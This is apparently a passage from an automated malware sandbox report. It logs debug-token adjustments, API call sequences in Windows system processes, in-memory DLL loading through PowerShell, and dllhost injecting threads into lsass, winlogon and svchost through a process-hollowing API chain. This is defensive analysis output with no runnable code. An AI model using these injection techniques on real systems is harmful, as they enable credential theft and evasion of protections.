Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001CA7D218814
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D2984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D2984B0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D29CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D29CD80
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D298814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001CA7D298814
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0000017D2DD58814
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B928814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0000022F4B928814
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B92CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000022F4B92CD80
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B9284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000022F4B9284B0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00000262F1CA8814
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1CACD80
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1CA84B0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00000262F1D08814
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1D0CD80
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1D084B0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00000262F1D38814
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1D3CD80
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1D384B0
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001B68BD2CD80
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001B68BD284B0
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000001B68BD28814
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001B68BD5CD80
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001B68BD584B0
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000001B68BD58814
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001E591CCCD80
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001E591CC84B0
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_000001E591CC8814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E138814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000002234E138814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E1384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002234E1384B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E13CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002234E13CD80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E168814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000002234E168814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E1684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002234E1684B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E16CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002234E16CD80
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000023942B1CD80
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_0000023942B18814
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000023942B184B0
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001EF056DCD80
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_000001EF056D8814
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001EF056D84B0
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF0570CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001EF0570CD80
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF05708814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_000001EF05708814
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF057084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001EF057084B0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_000002287AD48814
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002287AD484B0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002287AD4CD80
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_000001B94DA98814
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001B94DA9CD80
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001B94DA984B0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025202578814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0000025202578814
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000252025784B0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002520257CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002520257CD80
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00000252025A8814
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000252025A84B0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000252025ACD80
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_000001A9EBFC8814
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EBFCCD80
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EBFC84B0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EC6884B0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC68CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EC68CD80
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC688814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_000001A9EC688814
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6B84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EC6B84B0
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6BCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EC6BCD80
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6B8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_000001A9EC6B8814
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF163CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000019FF163CD80
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF1638814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0000019FF1638814
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF16384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000019FF16384B0
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF19ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000019FF19ACD80
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF19A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000019FF19A84B0
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF19A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0000019FF19A8814

HIPS / PFW / Operating System Protection Evasion

Source: 35.2.powershell.exe.213141b0000.0.raw.unpack, DLLFromMemory.cs | Reference to suspicious API methods: Win.VirtualAlloc(PtrAdd(pCode, iMAGE_SECTION_HEADER.VirtualAddress), (UIntPtr)sectionAlignment, AllocationType.COMMIT, MemoryProtection.READWRITE)
Source: 35.2.powershell.exe.213141b0000.0.raw.unpack, DLLFromMemory.cs | Reference to suspicious API methods: Win.LoadLibrary(PtrAdd(pCode, iMAGE_IMPORT_DESCRIPTOR.Name))
Source: 35.2.powershell.exe.213141b0000.0.raw.unpack, DLLFromMemory.cs | Reference to suspicious API methods: Win.GetProcAddress(intPtr2, PtrAdd(PtrAdd(pCode, intPtr5), 2))
Source: 35.2.powershell.exe.213141b0000.0.raw.unpack, DLLFromMemory.cs | Reference to suspicious API methods: Win.VirtualProtect(P_0, P_1, P_2, out P_3)
Source: C:\Windows\System32\dllhost.exe | Code function: 14_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,14_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\dwm.exe EIP: F1EB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 7A7D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7AD72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25DC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FC902EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4E102EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 98572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CFCF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8592EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 15D32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B1242EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 82CD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 61412EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: ADC42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3CB25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 997D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 28325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 29125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 15E25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27C25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2CC25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2A325AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 10825AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AB25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2FE25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 26A25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27F25AC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 27E25AC
